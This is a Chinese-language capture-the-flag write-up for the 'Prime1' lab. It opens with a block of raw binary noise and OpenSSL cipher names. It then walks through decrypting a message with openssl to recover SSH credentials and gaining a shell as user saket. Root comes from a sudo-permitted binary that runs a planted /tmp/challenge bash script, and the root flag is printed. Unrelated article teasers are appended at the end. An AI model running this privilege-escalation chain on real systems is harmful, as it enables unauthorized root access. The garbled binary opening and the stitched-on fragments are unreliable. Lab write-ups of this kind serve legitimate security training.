�!�#bW'ˀ�KE;!�"��{cyF
                     ���7^��4�^�▒�9v��N�Ŧ+2f
���{��u\Z�|�2   �0�'Z�j�wUpRd��ew�:�˪\�     �M�TkG%�Nƃ�g�S����Ր��O�{�osV�%�؆��c����0�a�YDD0d�Y�
C&camellia-128-ecb
camellia-192-cbc
�����?�E��wUaf�,T�]6�o�*��h}������J���7c�ю��@�J7��
                                                  ��L�������~�2C�L34�4ĺ�s��I�$>���7��f����O
                                                                                           �+�{liSLʉ���,��E�U   WǜS`Gsj����6�/��t~camellia-192-ecb
camellia-256-cbc
ހ��Ӑ��<�%wLC�~u����pgu�F��:XM��Jc�|����Ř▒��6"�����]7����#����Oܛ�=�
���K��F$��L����IF��u4�fE+.�-W����2
%�(�xC�E����s:�j��7��d�ئ!jc���S��2ʤcamellia-256-ecb
cast
cast5-cbc
cast5-cfb
F�?�<>�~�(�E}�5��\��▒S��4NZ硶Kt��A�fT���C�����R6�������7������-A|��5���Ƞ�`;R��c&m#m�T<x�cq=�oh�▒�0Wb�l��aB�aZ�z"��fTːq_ԙS���&Y�7�^;��]�9�t s�cast5-ecb
cast5-ofb
cast-cbc
des
des3
des-cbc
des-cfb
�Ղ�$�%�.�%��r�A�z��9�_�����;�E��f�|F:{��mfq2�j� >�<����0����Ӓ�������2�&?r�'��:k(#j�0N!���xU0��쯾6b�>���o)������des-ecb

+�D��L�Ҁ�7(��[x��%����E=<>d&�N�\�D���
��c�*� �`���OjJ-�X�{'��V�X{g��C▒J,�E
                                     �7�W3η���T��^T��DK=���w�j��&��J?����h(Վ�dId�
                                                                                 6�z��i���FYDN
                                                                                              Q��gdes-ede
6^{�h�R�J-'�yAv/>c�GHA�זϞ�V����$�㢡U�oX�+(���{X���)#KB��g,�5��▒�]��r恘`�����e�9���H▒�k��n�D�i|a��<\��Kc▒&9S�O��τjg�)�V��-�[7=��ݹgT��Thdes-ede3
des-ede3-cbc
des-ede3-cfb
des-ede3-ofb
des-ede-cbc
des-ede-cfb
des-ede-ofb
des-ofb
desx
md4
md5
rc2
rc2-40-cbc
rc2-64-cbc
rc2-cbc
rc2-cfb
�>�kO;}r�HLp
��0�+y@�m�^������'���L9*�X�A9{G�+��"��@w���8��wģ�"�TE�����uq(f�rc2-ecb
rc2-ofb
����3�'�/?�PR�| {���B�t�r_���?3�&
����I�9/`�v�����vz~z�(���5��k��iG�[<gG�▒���j`*/�f�2�
                                                     �VX�I.p�Y2DY4��=C��*���Rl!F��▒�t�fyE�<i��y!��MK�N� =<rc4
����NEI�g�▒�?�L��7�Aˍ�ZV.D*��d���Ʀ�2�J���fԦW    �<���,3���W��rIJ�q"��n���#雥��q����'��N6�(
A5-j��y]G!a��O��� z�[,?�T�r;rc4-40
rmd160
seed
seed-cbc
seed-cfb
+��     ��A��!]v6
�q�▒{T�:�$����  �Qr������4Tԥ�OY�▒�MU�*��{H�$�%�6X��Vc�F�W,���&<�1�GE2��{����4��Q0�{^;!J*��טŮ��PdDXH��Ɍ  �#�炅;�<DD��f�
                                                                                                                      tseed-ecb
seed-ofb
sha1
sha224
sha256
sha3-224
sha3-256
sha3-384
sha3-512
sha384
sha512
sha512-224
sha512-256
shake128
shake256
sm3
sm4-cbc
sm4-cfb
sm4-ctr
d��;�����c�?�>����=���)�,��Ǵx�]����+aT�Ja[�ˇ�����0�H����h�A��
                                                              pvyk���]!W�'�m�۽w�v^����n��᥊+���eB_ȓ��Jw�N���{7 ����d�B%A�␪��e��/�7=��\sm4-ecb
sm4-ofb
zlib
zstd

看到

Dont worry saket one day we will reach to
our destination very soon. And if you forget 
your username then use your old password
==> "tribute_to_ippsec"

Victor,aes-256-ecb

直接用 aes-256-ecb 试试看,果然是这样
内容 : Victor 对 saket 说,如果你忘记了密码,就用老密码
密码是 tribute_to_ippsec

┌──(kali㉿kali)-[~/testPrime1]
└─$ echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -aes-256-ecb -K 3336366137346362336339353964653137643631646233303539316333396431 
Dont worry saket one day we will reach to
our destination very soon. And if you forget 
your username then use your old password
==> "tribute_to_ippsec"

Victor,   

直接 ssh 梭哈

┌──(kali㉿kali)-[~/testPrime1]
└─$ sudo ssh saket@192.168.50.153    
[sudo] password for kali: 
Sorry, try again.
[sudo] password for kali: 
The authenticity of host '192.168.50.153 (192.168.50.153)' can't be established.
ED25519 key fingerprint is SHA256:j4BjjDNA4iDRgwl0m3uHtlNdQm8M97LMWuNBsgHbxt0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.50.153' (ED25519) to the list of known hosts.
saket@192.168.50.153's password: 
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

661 packages can be updated.
515 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sat Aug 31 05:31:31 2019
$ 


拿到 saket 的 shell,ip 也是对的 (在初级的反弹 shell 中,用户是 www-data)

$ whoami
saket
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:5c:c7:58 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.153/24 brd 192.168.50.255 scope global dynamic ens33
       valid_lft 1691sec preferred_lft 1691sec
    inet6 fe80::dc85:1101:d755:d6fc/64 scope link 
       valid_lft forever preferred_lft forever
$ ls
enc  enc.txt  key.txt  password.txt  user.txt
$ 

看看机器有没有装 python3 ,结果是有的

$ dpkg -l | python3

成了,芜湖 ✌

$ python -c "import pty;pty.spawn('/bin/bash')"
saket@ubuntu:~$ 

由 sudo -l 提示 能无密码的执行 /home/victor/undefeated_victor
执行后发现一句话 : …
文件/tmp/challenge没找到

saket@ubuntu:~$ whoami
saket
saket@ubuntu:~$ sudo -l
Matching Defaults entries for saket on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User saket may run the following commands on ubuntu:
    (root) NOPASSWD: /home/victor/undefeated_victor
saket@ubuntu:~$ strings /home/victor/undefeated_victor
strings: /home/victor/undefeated_victor: Permission denied
saket@ubuntu:~$ cd /home/victor/
saket@ubuntu:/home/victor$ ls -liah
ls: cannot open directory '.': Permission denied
saket@ubuntu:/home/victor$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
saket@ubuntu:/home/victor$ 

那就创建文件/tmp/challenge,往里写点东西
提权成功

saket@ubuntu:~$ sudo -l
Matching Defaults entries for saket on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User saket may run the following commands on ubuntu:
    (root) NOPASSWD: /home/victor/undefeated_victor
saket@ubuntu:~$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
saket@ubuntu:~$ echo '#!/bin/bash' > /tmp/challenge
saket@ubuntu:~$ echo '/bin/bash' >> /tmp/challenge
saket@ubuntu:~$ cat /tmp/challenge
#!/bin/bash
/bin/bash
saket@ubuntu:~$ chmod 777 /tmp/challenge
saket@ubuntu:~$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
root@ubuntu:~# 

找 flag , 拿下

root@ubuntu:/root# whoami
root
root@ubuntu:/root# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:5c:c7:58 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.153/24 brd 192.168.50.255 scope global dynamic ens33
       valid_lft 1178sec preferred_lft 1178sec
    inet6 fe80::dc85:1101:d755:d6fc/64 scope link 
       valid_lft forever preferred_lft forever
root@ubuntu:/root# ls -liah
total 92K
917506 drwx------  5 root root 4.0K Aug 31  2019 .
     2 drwxr-xr-x 24 root root 4.0K Aug 29  2019 ..
964588 -rw-------  1 root root 8.4K Sep 19 02:12 .bash_history
917598 -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
917597 drwx------  3 root root 4.0K Aug 30  2019 .cache
969793 -rwxr-xr-x  1 root root  14K Aug 30  2019 enc
969795 -rw-r--r--  1 root root  305 Aug 30  2019 enc.cpp
969797 -rw-r--r--  1 root root  237 Aug 30  2019 enc.txt
969798 -rw-r--r--  1 root root  123 Aug 30  2019 key.txt
969791 -rw-------  1 root root  137 Aug 30  2019 .mysql_history
964098 drwxr-xr-x  2 root root 4.0K Aug 29  2019 .nano
917599 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
969794 -rw-r--r--  1 root root   33 Aug 30  2019 root.txt
969796 -rw-r--r--  1 root root   66 Aug 31  2019 .selected_editor
969780 -rw-r--r--  1 root root  805 Aug 30  2019 sql.py
969790 -rwxr-xr-x  1 root root  442 Aug 31  2019 t.sh
964589 drwxr-xr-x 10 root root 4.0K Aug 30  2019 wfuzz
964464 -rw-r--r--  1 root root  170 Aug 29  2019 wordpress.sql
root@ubuntu:/root# cat root.txt
b2b17036da1de94cfb024540a8e7075a
root@ubuntu:/root# sudo -l
Matching Defaults entries for root on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User root may run the following commands on ubuntu:
    (ALL : ALL) ALL
root@ubuntu:/root# 

总结

拿初级的反弹 shell,用户为 www-data
查看文件时看到 enc 的名字,想到 openssl 相关
用 find 找文件名为 backup 的备份文件,靶机适用
对于一般的用户使用习惯,/opt 中存放备份文件是一个特点
在备份文件中找到执行 enc 需要的密码
执行 enc 后,找到 enc.txt 和 key.txt
处理 key 使用 awk od tr , 把 ‘ippsec’ 的 md5 转为 hex
用 openssl 的语法,尝试加密方式,写脚本解密文,最终得到 saket 的 ssh 密码
登录进去后发现 sudo -l 找到一个文件,执行文件后发现每找到另一个文件(可能是软连接?)
就把文件创建并写一些内容,执行,拿到 root
结束

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2154757.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【linux】nice命令

Linux中的nice命令是一个强大的工具&#xff0c;用于调整进程的优先级&#xff0c;进而影响它们在CPU上的资源分配和执行顺序。以下是关于nice命令的详细解释&#xff0c;包括其用途、语法、参数、示例以及使用建议。 一、用途 nice命令主要用于控制进程在CPU上的调度优先级&…

Springboot3 + MyBatis-Plus + MySql + Uniapp 实现商品规格选择sku(附带自设计数据库,最新保姆级教程)

Springboot3 MyBatis-Plus MySql Uniapp 实现商品规格选择sku&#xff08;附带自设计数据库&#xff0c;最新保姆级教程&#xff09; 1、效果展示2、数据库设计2.1 商品表2.2 商品价格和规格中间表2.3 商品规格表 3、后端代码3.1 model3.2 vo3.3 mapper、server、serverImp3…

DNS是什么?怎么设置

NS是什么意思?有什么用呢?专业的说DNS就是域名系统 (Domain Name System)的简称&#xff0c;也就是IT人士常说的域名解析系统。主要是让用户在互联网上通过域名找到域名对应的IP地址&#xff0c;因为IP地址都是一串数字(例如&#xff1a;192.168.0.1)不方便记忆&#xff0c;便…

华为全联接大会HUAWEI Connect 2024印象(一):OpenEuler

因为和华为有课程合作&#xff0c;此次应邀参加了华为全联接大会 &#xff08;HUAWEI Connect 2024&#xff09;&#xff0c;分几次分享一下自己的见闻。 HUAWEI Connect 2024的规模很大&#xff0c;不过主要面向的应该是企业市场&#xff0c;我比较关注的嵌入式系统的内容很少…

学习笔记——RegNet:Designing Network Design Spaces

RegNet&#xff1a;Designing Network Design Spaces RegNet&#xff1a;设计一个网络设计空间 论文地址&#xff1a; https://arxiv.org/pdf/2003.13678 1、前言 在这项工作中&#xff0c;作者提出了一种新的网络设计范例。 作者的目标是帮助增进对网络设计的理解并发现跨设置…

Stable Diffusion Fooocus批量绘图脚本

当当当挡~&#xff0c;流动传热数值计算之余发布点AIGC相关文章&#xff0c;希望大家能喜欢~ 1 Stable Diffusion各种UI分析对比 提示&#xff1a;此部分主要是对SD各种界面的简要介绍和对比&#xff0c;只关注Fooocus批量绘图的读者可直接跳到第二部分。 Stable Diffusion …

进程间的通信4 共享内存

共享内存 1.共享内存简介 共享内存是将分配的物理空间直接映射到进程的用户虚拟地址空间中&#xff0c;减少数据在内核空间缓存共享内存是一种效率较高的进程间通讯的方式在 Linux 系统中通过 ipcs -m 查看所有的共享内存 共享内存模型图 2.共享内存的创建 1.函数头文件 #…

【6DRepNet360全范围头部姿态估计onnxruntime推理】

6DRepNet360全范围头部姿态估计 标题摘要关键词主要贡献方法概述实验结论模型转换和onnxruntime推理模型和代码下载可视化结果代码 这篇论文的核心内容是关于一种用于全范围旋转头部姿态估计的新方法。以下是关键点的总结&#xff1a; 标题 Towards Robust and Unconstrained…

输电线路数据集

输电线路数据集&#xff08;绝缘子自爆&#xff0c;破损&#xff0c;闪络&#xff0c;鸟巢&#xff0c;防震锤脱落五种缺陷&#xff09; 包括 1.绝缘子自爆 2.绝缘子破损绝、闪络 3.鸟巢 4.防震锤脱落 数据增强后的数量 对应数量&#xff1a;1828&#xff0c;1467&#xff0c;4…

【Godot4.3】剪贴板相关以及粘贴截图

概述 Godot4.3中更新了一些关于剪贴板的方法&#xff0c;获取图片赫然在列&#xff0c;这意味着可以在自己的应用中创建诸如粘贴截图的功能。 这些方法被包含在DisplaySever单例中&#xff0c;有兴趣的戈友可以自己去翻一下文档。或许可以实现Godot版本的屏幕截图工具。 相关…

Java | Leetcode Java题解之第414题第三大的数

题目&#xff1a; 题解&#xff1a; class Solution {public int thirdMax(int[] nums) {Integer a null, b null, c null;for (int num : nums) {if (a null || num > a) {c b;b a;a num;} else if (a > num && (b null || num > b)) {c b;b num;…

Maven笔记(二):进阶使用

Maven笔记&#xff08;二&#xff09;-进阶使用 一、Maven分模块开发 分模块开发对项目的扩展性强&#xff0c;同时方便其他项目引入相同的功能。 将原始模块按照功能拆分成若干个子模块&#xff0c;方便模块间的相互调用&#xff0c;接口共享(类似Jar包一样之间引用、复用)…

【LLM学习之路】9月16日 第六天

【LLM学习之路】9月16日 第六天 损失函数 L1Loss 可以取平均也可以求和 参数解析 input &#xff08;N&#xff0c;*&#xff09; N是batchsize&#xff0c;星号代表可以是任意维度 不是输入的参数&#xff0c;只是描述数据 target 形状要同上 MSELoss平方差 CrossEntr…

物理学基础精解【7】

文章目录 平面方程直角坐标及基本运算 参考文献 平面方程 直角坐标及基本运算 向量的四则运算 下面由文心一言自动生成 向量的四则运算主要包括加法、减法、数乘&#xff08;标量乘法&#xff09;和数量积&#xff08;点积或内积&#xff09;&#xff0c;但通常不直接称为“除…

python sql中带引号字符串(单双引号)转义处理

描述&#xff1a; 最近在爬取数据保存到数据库时&#xff0c;遇到有引号的字符串插入MySQL报错&#xff1a;1064, "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 转义字符串…

线程(三) 线程的互斥

文章目录 线程线程的同步和互斥线程同步线程互斥为什么要使用线程互斥什么是线程同步示例--线程操作共享资源引发问题 线程互斥--互斥锁示例--使用互斥锁来保证取款操作 互斥锁的属性示例--创建不同的属性的互斥锁后进行加锁操作 线程互斥--读写锁示例--对读写锁进行使用以观察…

鸿蒙【项目打包】- .hap 和 .app;(测试如何安装发的hap包)(应用上架流程)

#打包成.hap需要用到真机 原因是&#xff1a;只有用上了真机才能在项目中配置 自动签名 #步骤: ##第一步:选择真机->选择项目结构->点Sigining Configs(签名配置) ##第二步:勾选Automatically generate signature(自动签名)->点击ok ##第三步:点击构建->点击 …

伊犁云计算22-1 rhel8 dhcp 配置

1 局域网搭建 2 yum 配置 这个参考前面 不说 3 dnf 安装dhcp 好我们废话不说开始安装。理论看书去 进入 dhcp.conf 配置 重启dhcpd 不能报错&#xff01;&#xff01;&#xff01;&#xff01; 我们在客户机上做测试 全局的dhcp关闭 很明显我们的客户机获取到192.16…

Why Is Prompt Tuning for Vision-Language Models Robust to Noisy Labels?

文章汇总 本文的作者针对了提示学习的结构设计进行了分析&#xff0c;发现了一些规律&#xff1a; 1)固定的类名令牌为模型的优化提供了强正则化&#xff0c;减少了由噪声样本引起的梯度。 2)从多样化和通用的web数据中学习到的强大的预训练图像文本嵌入为图像分类提供了强大…

李宏毅机器学习2023-HW11-Domain Adaptation

文章目录 TaskLinkBaselineSimple BaselineMedium BaselineStrong BaselineBoss Baseline Task Domain Adaptation 通过训练真实图片得到分类模型&#xff0c;并将其应用到涂鸦图片上进行分类&#xff0c;来获得更高的精准度。 Link kaggle colab Baseline Simple Baseli…